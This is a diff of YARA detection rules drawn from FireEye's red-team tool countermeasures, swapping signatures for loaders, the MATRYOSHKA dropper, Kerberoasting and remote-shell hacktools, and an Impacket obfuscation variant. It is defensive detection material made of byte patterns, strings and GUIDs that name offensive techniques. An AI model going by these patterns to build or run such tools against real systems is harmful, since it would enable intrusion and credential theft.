"f919e3fc-cf76-53af-8f04-24921830666f" - date = "2020-12-09" + id = "0afcf13e-5cd3-5c1c-897e-b6d0c283ab0f" + date = "2020-12-02" + date = "2020-12-02" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/supplemental/yara/Loader_MSIL_Generic_1.yar#L4-L21" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Builder_Win64_MATRYOSHKA_1.yar#L4-L20" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "b8415b4056c10c15da5bba4826a44ffd" - logic_hash = "06cddd7e1c1c778348539cfd50f01d55f86689dec86c045d7ce7b9cd71690e07" + hash = "8d949c34def898f0f32544e43117c057" + logic_hash = "b370d7dea44bccc92fc8dbd4ea0ee9bec523820108bf8bc67acb17ebf9835f74" score = 75 quality = 75 tags = "FILE" - rev = 5 + rev = 1 strings: - $MSIL = "_CorExeMain" - $opc1 = { 00 72 [4] 0A 72 [4] 0B 06 28 [4] 0C 12 03 FE 15 [4] 12 04 FE 15 [4] 07 14 } - $str1 = "DllImportAttribute" - $str2 = "FromBase64String" - $str3 = "ResumeThread" - $str4 = "OpenThread" - $str5 = "SuspendThread" - $str6 = "QueueUserAPC" + $sb1 = { 4D 5A 45 52 [0-32] E8 [0-32] 00 00 00 00 [0-32] 5B 48 83 EB 09 53 48 81 [0-32] C3 [0-32] FF D3 [0-32] C3 } + $ss1 = "\x00Stub Size: " + $ss2 = "\x00Executable Size: " + $ss3 = "\x00[+] Writing out to file" condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and $MSIL and all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them } -rule FIREEYE_RT_Loader_Win_Generic_19 : FILE +rule FIREEYE_RT_APT_Dropper_Win64_MATRYOSHKA_1 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "matryoshka_dropper.rs" author = "FireEye" - id = "4f4427ee-0f7d-5442-98a6-402d8b797289" + id = "1406aafd-6217-51ef-b3af-107ee88f9c99" date = "2020-12-02" date = "2020-12-02" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/supplemental/yara/Loader_Win_Generic_19.yar#L4-L19" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Dropper_Win64_MATRYOSHKA_1.yar#L4-L18" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "3fb9341fb11eca439b50121c6f7c59c7" - logic_hash = "6db9696663c19857c1f89339b8cc9b0565e877f34e8d8cf77b89ef22b3f41683" + hash = "edcd58ba5b1b87705e95089002312281" + logic_hash = "23f811f8e9387ca6a1257a31af66de9739733e4728adba0a3e3f74b5e5c0a556" score = 75 quality = 75 tags = "FILE" rev = 1 strings: - $s0 = { 8B [1-16] 89 [1-16] E8 [4-32] F3 A4 [0-16] 89 [1-8] E8 } - $s1 = { 83 EC [1-16] 04 00 00 00 [1-24] 00 30 00 00 [1-24] FF 15 [4-16] EB [16-64] 20 00 00 00 [0-8] FF 15 [4-32] C7 44 24 ?? 00 00 00 00 [0-8] C7 44 24 ?? 00 00 00 00 [0-16] FF 15 } - $si1 = "VirtualProtect" fullword - $si2 = "malloc" fullword + $sb1 = { 8D 8D [4] E8 [4] 49 89 D0 C6 [2-6] 01 C6 [2-6] 01 [0-8] C7 44 24 ?? 0E 00 00 00 4C 8D 0D [4] 48 8D 8D [4] 48 89 C2 E8 [4] C6 [2-6] 01 C6 [2-6] 01 48 89 E9 48 8D 95 [4] E8 [4] 83 [2] 01 0F 8? [4] 48 01 F3 48 29 F7 48 [2] 08 48 89 85 [4] C6 [2-6] 01 C6 [2-6] 01 C6 [2-6] 01 48 8D 8D [4] 48 89 DA 49 89 F8 E8 } + $sb2 = { 0F 29 45 ?? 48 C7 45 ?? 00 00 00 00 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 0F 29 45 ?? 48 C7 45 ?? 00 00 00 00 C7 45 ?? 68 00 00 00 48 8B [2] 48 8D [2] 48 89 [3] 48 89 [3] 0F 11 44 24 ?? C7 44 24 ?? 08 00 00 0C C7 44 24 ?? 00 00 00 00 31 ?? 48 89 ?? 31 ?? 45 31 ?? 45 31 ?? E8 [4] 83 F8 01 } condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and ( uint16( uint32(0x3C)+0x18)==0x020B) and all of them } -rule FIREEYE_RT_Loader_Win_Generic_20 : FILE +rule FIREEYE_RT_APT_Dropper_Win_MATRYOSHKA_1 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "matryoshka_dropper.rs" author = "FireEye" - id = "d1d3eff8-d12e-53f6-8c30-06ecedaf3f49" + id = "7fd305c7-0b1b-5d91-b968-7f1fb0a8ae47" date = "2020-12-02" date = "2020-12-02" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/supplemental/yara/Loader_Win_Generic_20.yar#L4-L19" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Dropper_Win_MATRYOSHKA_1.yar#L4-L20" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "5125979110847d35a338caac6bff2aa8" - logic_hash = "9611aed2b4e4278d40254cb5c4fe94a458cfa19f10e6fe888bc7ceb166669cc6" + hash = "edcd58ba5b1b87705e95089002312281" + logic_hash = "a7bf7599ec9b4b1d09a8c90b70ae565a9396fb31d449da3c1492d6fa336d9c5e" score = 75 quality = 75 tags = "FILE" rev = 1 strings: - $s0 = { 8B [1-16] 89 [1-16] E8 [4-32] F3 A4 [0-16] 89 [1-8] E8 } - $s2 = { 83 EC [4-24] 00 10 00 00 [4-24] C7 44 24 ?? ?? 00 00 00 [0-8] FF 15 [4-24] 89 [1-4] 89 [1-4] 89 [1-8] FF 15 [4-16] 3? ?? 7? [4-24] 20 00 00 00 [4-24] FF 15 [4-32] F3 A5 } - $si1 = "VirtualProtect" fullword - $si2 = "malloc" fullword + $s1 = "\x00matryoshka.exe\x00" + $s2 = "\x00Unable to write data\x00" + $s3 = "\x00Error while spawning process. NTStatus: \x0a\x00" + $s4 = "\x00.execmdstart/Cfailed to execute process\x00" condition: ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_MSIL_Launcher_DUEDLLIGENCE_1 : FILE +rule FIREEYE_RT_Loader_MSIL_Sharpy_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'DUEDLLIGENCE' project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharPy' project." author = "FireEye" - id = "86f0ebe5-110b-53e2-bba5-676f00c2cddd" + id = "7c7bda22-bacc-5901-a650-a30c9cfcdee7" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/MSIL_Launcher_DUEDLLIGENCE_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPY/production/yara/Loader_MSIL_SharPy_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "a91bf61cc18705be2288a0f6f125068f" - logic_hash = "bd6abaa909f0c776d81ed1115e875888336661c91df3881f4f3ea5dd27e115f8" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "0f73fab3905b4961b8dbeb120d45a34a2383ecdaae0296f38e34f8b7ab4aeee8" score = 75 quality = 73 tags = "FILE" rev = 1 strings: - $typelibguid0 = "73948912-cebd-48ed-85e2-85fcd1d4f560" ascii nocase wide + $typelibguid0 = "f6cf1d3b-3e43-4ecf-bb6d-6731610b4866" ascii nocase wide condition: ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } import "pe" -rule FIREEYE_RT_Loader_MSIL_DUEDLLIGENCE_2 : FILE +rule FIREEYE_RT_APT_Backdoor_PS1_BASICPIPESHELL_1 { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "b10b476a-0d38-53e4-80cf-559618729268" + id = "8f85d6cc-fd1e-5bf3-8052-440cbeda0ac9" date = "2020-12-18" modified = "2020-12-18" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/Loader_MSIL_DUEDLLIGENCE_2.yar#L5-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BASICPIPESHELL/production/yara/APT_Backdoor_PS1_BASICPIPESHELL_1.yar#L5-L18" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - logic_hash = "5a2e0559e3b47c1957a42929fbbeba7a53c21619125381b01dcd8453b6ec4802" + logic_hash = "7a9f0002055ffe826562cab3d02d8babd14c5fcd6d0b528a2988e2649034279d" score = 75 - quality = 75 - tags = "FILE" + quality = 63 + tags = "" strings: - $1 = "DueDLLigence" fullword - $2 = "CPlApplet" fullword - $iz1 = /_Cor(Exe|Dll)Main/ fullword + $s1 = "function Invoke-Client()" ascii nocase wide + $s2 = "function Invoke-Server" ascii nocase wide + $s3 = "Read-Host 'Enter Command:'" ascii nocase wide + $s4 = "new-object System.IO.Pipes.NamedPipeClientStream(" ascii nocase wide + $s5 = "new-object System.IO.Pipes.NamedPipeServerStream(" ascii nocase wide + $s6 = " = iex $" ascii nocase wide condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them + all of them } -rule FIREEYE_RT_Hacktool_MSIL_HOLSTER_1 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_DTRIM_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the a customized version of the 'DUEDLLIGENCE' project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'dtrim' project, which is a modified version of SharpSploit." author = "FireEye" - id = "e1e8979e-2dee-5061-a11d-00dcfba476c3" + id = "9be695a1-6d18-5952-974c-96a30f035e7a" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/HackTool_MSIL_HOLSTER_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DTRIM/production/yara/APT_HackTool_MSIL_DTRIM_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "a91bf61cc18705be2288a0f6f125068f" - logic_hash = "bc254a1ab71f2a6092f139ce5a85347a7a4976f963603ffbbebb9b0d6ce6573c" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "357c1f76631ec9ee342995cd12369fd9ff18c541bffe6f5464b1e8db45057196" score = 75 quality = 73 tags = "FILE" rev = 2 strings: - $typelibguid1 = "a8bdbba4-7291-49d1-9a1b-372de45a9d88" ascii nocase wide + $typelibguid0 = "7760248f-9247-4206-be42-a6952aa46da2" ascii nocase wide condition: ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -import "pe" - -rule FIREEYE_RT_Loader_MSIL_DUEDLLIGENCE_3 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_FLUFFY_2 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "42e4e777-6d51-5733-97df-dc27f13a27b7" - date = "2020-12-18" - modified = "2020-12-18" + id = "ce39710e-7649-5f7d-bbbe-65dc30f678e8" + date = "2020-12-04" + date = "2020-12-04" + modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/Loader_MSIL_DUEDLLIGENCE_3.yar#L5-L16" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/FLUFFY/production/yara/APT_HackTool_MSIL_FLUFFY_2.yar#L4-L21" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - logic_hash = "41cc6a4c7765b1e5e88d12660b69e434c83938ca974b9ccf6545b4dd5dd78378" + hash = "11b5aceb428c3e8c61ed24a8ca50553e" + logic_hash = "872ab717668375a49d6c7b1927a680747b405c0198fe4fc6f43ccc562870eb37" score = 75 quality = 75 tags = "FILE" + rev = 1 strings: - $create_thread_injected = { 7E [2] 00 0A 0A 16 0B 16 8D [2] 00 01 0C 28 [2] 00 06 2? ?? 2A 28 [2] 00 0A 1E 3? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 2? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 7E [2] 00 0A 08 8E 69 7E [2] 00 04 7E [2] 00 04 28 [2] 00 06 0D 09 7E [2] 00 0A 28 [2] 00 0A } - $iz1 = /_Cor(Exe|Dll)Main/ fullword - $rc4 = { 20 00 01 00 00 8D [2] 00 01 1? ?? 20 00 01 00 00 8D [2] 00 01 1? ?? 03 8E 69 8D [2] 00 01 1? ?? 16 0B 2B ?? 1? ?? 07 02 07 02 8E 69 5D 91 9E 1? ?? 07 07 9E 07 17 58 0B 07 20 00 01 00 00 32 } - $suspended_process = { 12 ?? FE 15 [2] 00 02 1? ?? FE 15 [2] 00 02 02 14 7E [2] 00 0A 7E [2] 00 0A 16 20 [2] 00 08 7E [2] 00 0A 14 12 ?? 12 ?? 28 [2] 00 06 } + $s1 = "\x00Asktgt\x00" + $s2 = "\x00Kerberoast\x00" + $s3 = "\x00HarvestCommand\x00" + $s4 = "\x00EnumerateTickets\x00" + $s5 = "[*] Action: " wide + $s6 = "\x00Fluffy.Commands\x00" condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them } -import "pe" - -rule FIREEYE_RT_Loader_MSIL_DUEDLLIGENCE_1 : FILE +rule FIREEYE_RT_APT_Hacktool_MSIL_FLUFFY_1 : FILE { meta: description = "No description has been set in the source file - FireEye-RT" author = "FireEye" - id = "d438575f-3cb2-5cff-b5d4-733044f62e61" - date = "2020-12-18" - modified = "2020-12-18" + id = "6593202d-9b30-59ed-98c0-3e730fb5ceb7" + date = "2020-12-04" + date = "2020-12-04" + modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/Loader_MSIL_DUEDLLIGENCE_1.yar#L5-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/FLUFFY/production/yara/APT_HackTool_MSIL_FLUFFY_1.yar#L4-L18" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - logic_hash = "56237d686b954950849adeedc87d5f9fbff2335a0ff033ba8571b3e3b93f587c" + hash = "11b5aceb428c3e8c61ed24a8ca50553e" + logic_hash = "4d91c96ab7b628e88f79ee193612acc959448fe2220ef54371f5f5c6e7305d86" score = 75 quality = 75 tags = "FILE" + rev = 1 strings: - $create_thread_injected = { 7E [2] 00 0A 0A 16 0B 16 8D [2] 00 01 0C 28 [2] 00 06 2? ?? 2A 28 [2] 00 0A 1E 3? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 2? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 7E [2] 00 0A 08 8E 69 7E [2] 00 04 7E [2] 00 04 28 [2] 00 06 0D 09 7E [2] 00 0A 28 [2] 00 0A } - $iz1 = /_Cor(Exe|Dll)Main/ fullword - $suspended_process = { 12 ?? FE 15 [2] 00 02 1? ?? FE 15 [2] 00 02 02 14 7E [2] 00 0A 7E [2] 00 0A 16 20 [2] 00 08 7E [2] 00 0A 14 12 ?? 12 ?? 28 [2] 00 06 } + $sb1 = { 0E ?? 1? 72 [4] 28 [2] 00 06 [0-16] 28 [2] 00 0A [2-80] 1F 58 0? [0-32] 28 [2] 00 06 [2-32] 1? 28 [2] 00 06 0? 0? 6F [2] 00 06 [2-4] 1F 0B } + $sb2 = { 73 [2] 00 06 13 ?? 11 ?? 11 ?? 7D [2] 00 04 11 ?? 73 [2] 00 0A 7D [2] 00 04 0E ?? 2D ?? 11 ?? 7B [2] 00 04 72 [4] 28 [2] 00 0A [2-32] 0? 28 [2] 00 0A [2-16] 11 ?? 7B [2] 00 04 0? 28 [2] 00 0A 1? 28 [2] 00 0A [2-32] 7E [2] 00 0A [0-32] FE 15 [2] 00 02 [0-16] 7D [2] 00 04 28 [2] 00 06 [2-32] 7B [2] 00 04 7D [2] 00 04 [2-32] 7C [2] 00 04 FE 15 [2] 00 02 [0-16] 11 ?? 8C [2] 00 02 28 [2] 00 0A 28 [2] 00 0A [2-80] 8C [2] 00 02 28 [2] 00 0A 12 ?? 12 ?? 12 ?? 28 [2] 00 06 } + $ss1 = "\x00Fluffy\x00" condition: - ( uint16(0)==0x5A4D) and ( uint32( uint32(0x3C))==0x00004550) and all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and all of them } -rule FIREEYE_RT_Trojan_Macro_RESUMEPLEASE_1 +rule FIREEYE_RT_Tool_MSIL_Sharpgrep_1 : FILE { meta: - description = "No description has been set in the source file - FireEye-RT" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharpGrep' project." author = "FireEye" - id = "068662f6-28b8-5538-8bc3-6506565305ae" - date = "2020-12-01" - date = "2020-12-01" + id = "c7569d33-f57d-5f9c-aa2a-78866c680b5b" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/RESUMEPLEASE/production/yara/Trojan_Macro_RESUMEPLEASE_1.yar#L4-L21" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPPGREP/production/yara/Tool_MSIL_SharpGrep_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "d5d3d23c8573d999f1c48d3e211b1066" - logic_hash = "040457bc446e496431129ff4623ddda5d9c2ce339ba65a7fbe42114626f36c60" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "c22bfc50b3ab3c4082006aad3c3c89684cffe1e429b001b0bb08758856a47d04" score = 75 - quality = 75 - tags = "" + quality = 73 + tags = "FILE" rev = 1 strings: - $str00 = "For Binary As" - $str01 = "Range.Text" - $str02 = "Environ(" - $str03 = "CByte(" - $str04 = ".SpawnInstance_" - $str05 = ".Create(" + $typelibguid0 = "f65d75b5-a2a6-488f-b745-e67fc075f445" ascii nocase wide condition: - all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_Hacktool_MSIL_Sharpschtask_1 : FILE +rule FIREEYE_RT_Hacktool_MSIL_SHARPZEROLOGON_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharpSchtask' project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public 'sharpzerologon' project." author = "FireEye" - id = "5c7a5dee-3bc2-54b2-a7e2-be05ba74d4a1" + id = "51f22eee-fb96-55b0-8c02-1a0e9910a93e" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSCHTASK/production/yara/HackTool_MSIL_SharpSchtask_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPZEROLOGON/production/yara/HackTool_MSIL_SHARPZEROLOGON_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" hash = "dd8805d0e470e59b829d98397507d8c2" - logic_hash = "7437fde82920f4d015a7f149b58924baf6cb220c6f6857d9509e23795ff0811c" + logic_hash = "ed6a9bef5c6ee03aff969b8765b284ace517f2e6a1ef114acb04cf094c69cfa5" score = 75 quality = 73 tags = "FILE" - rev = 1 + rev = 3 strings: - $typelibguid0 = "0a64a5f4-bdb6-443c-bdc7-f6f0bf5b5d6c" ascii nocase wide + $typelibguid0 = "15ce9a3c-4609-4184-87b2-e29fc5e2b770" ascii nocase wide condition: ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_Hacktool_PY_Impacketobfuscation_2 +rule FIREEYE_RT_Loader_MSIL_Inmemorycompilation_1 : FILE { meta: - description = "wmiexec" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'In-MemoryCompilation' project." author = "FireEye" - id = "f1059f66-eaff-5866-bafb-c94236cf96a0" - date = "2020-12-01" - date = "2020-12-01" + id = "80234352-a449-5292-9f0c-beb7a1d39a6c" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/IMPACKETOBF (Wmiexec)/production/yara/HackTool_PY_ImpacketObfuscation_2.yar#L4-L21" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MEMCOMP/production/yara/Loader_MSIL_InMemoryCompilation_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "f3dd8aa567a01098a8a610529d892485" - logic_hash = "ccbbe507798f16c7acf0780770fdb81b2e7dc333ab8bc51e6216816276c3f14b" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "a964a186eb02a2792db01727a31ddaa2414fe9df83cda9b1c9db15d94603303a" score = 75 - quality = 75 - tags = "" + quality = 73 + tags = "FILE" rev = 2 strings: - $s1 = "import random" - $s2 = "class WMIEXEC" nocase - $s3 = "class RemoteShell" nocase - $s4 = /=[\x09\x20]{0,32}str\(int\(time\.time\(\)\)[\x09\x20]{0,32}-[\x09\x20]{0,32}random\.randint\(\d{1,10}[\x09\x20]{0,32},[\x09\x20]{0,32}\d{1,10}\)\)[\x09\x20]{0,32}\+[\x09\x20]{0,32}str\(uuid\.uuid4\(\)\)\.split\([\x22\x27]\-[\x22\x27]\)\[0\]/ - $s5 = /self\.__shell[\x09\x20]{0,32}=[\x09\x20]{0,32}[\x22\x27]cmd.exe[\x09\x20]{1,32}\/q[\x09\x20]{1,32}\/K [\x22\x27]/ nocase + $typelibguid0 = "524d2687-0042-4f93-b695-5579f3865205" ascii nocase wide condition: - all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_Hacktool_PY_Impacketobfuscation_1 +rule FIREEYE_RT_Loader_MSIL_Wmirunner_1 : FILE { meta: - description = "smbexec" + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WMIRunner' project." author = "FireEye" - id = "992d1132-3136-5e1b-a1ef-dcdf36ebf0f5" - date = "2020-12-01" - date = "2020-12-01" + id = "04c6acfc-859f-5e4a-8c59-9adf08f21657" + date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/IMPACKETOBF (Smbexec)/production/yara/HackTool_PY_ImpacketObfuscation_1.yar#L4-L22" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMIRUNNER/production/yara/Loader_MSIL_WMIRunner_1.yar#L4-L15" license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt" - hash = "0b1e512afe24c31531d6db6b47bac8ee" - logic_hash = "45a4c0426b29b8c8bede9c4e8292131da7e756d48fc3ac4a07d08fd52383d21e" + hash = "dd8805d0e470e59b829d98397507d8c2" + logic_hash = "49d21756a4f0b29909c4b0fa9f3a98dd0480f9401923032de4b3920814b85f29" score = 75 - quality = 75 - tags = "" + quality = 73 + tags = "FILE" rev = 1 strings: - $s1 = "class CMDEXEC" nocase - $s2 = "class RemoteShell" nocase - $s3 = "self.services_names" - $s4 = "import random" - $s6 = /self\.__shell[\x09\x20]{0,32}=[\x09\x20]{0,32}[\x22\x27]%CoMSpEC%[\x09\x20]{1,32}\/q[\x09\x20]{1,32}\/K [\x22\x27]/ nocase - $s7 = /self\.__serviceName[\x09\x20]{0,32}=[\x09\x20]{0,32}self\.services_names\[random\.randint\([\x09\x20]{0,32}0[\x09\x20]{0,32},[\x09\x20]{0,32}len\(self\.services_names\)[\x09\x20]{0,32}-[\x09\x20]{0,32}1\)\]/ + $typelibguid0 = "6cc61995-9fd5-4649-b3cc-6f001d60ceda" ascii nocase wide condition: - all of them + ( uint16(0)==0x5A4D and uint32( uint32(0x3C))==0x00004550) and any of them } -rule FIREEYE_RT_Builder_MSIL_G2JS_1 : FILE +rule FIREEYE_RT_Hacktool_MSIL_Prepshellcode_1 : FILE { meta: - description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the Gadget2JScript project." + description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'PrepShellcode' project." author = "FireEye" - id = "484202c2-ac7d-5e6c-8bf1-3452a357c668" + id = "32fb6b1d-e01f-5555-8516-088dca2166cf" date = "2020-12-09" modified = "2020-12-09" reference = "https://github.com/mandiant/red_team_tool_countermeasures/" - source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/G2JS/production/yara/Builder_MSIL_G2JS_1.yar#L4-L15" + source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PREPSHELLCODE/production/yara/HackTool_MSIL_PrepShellcode_1.yar#L4-L15" 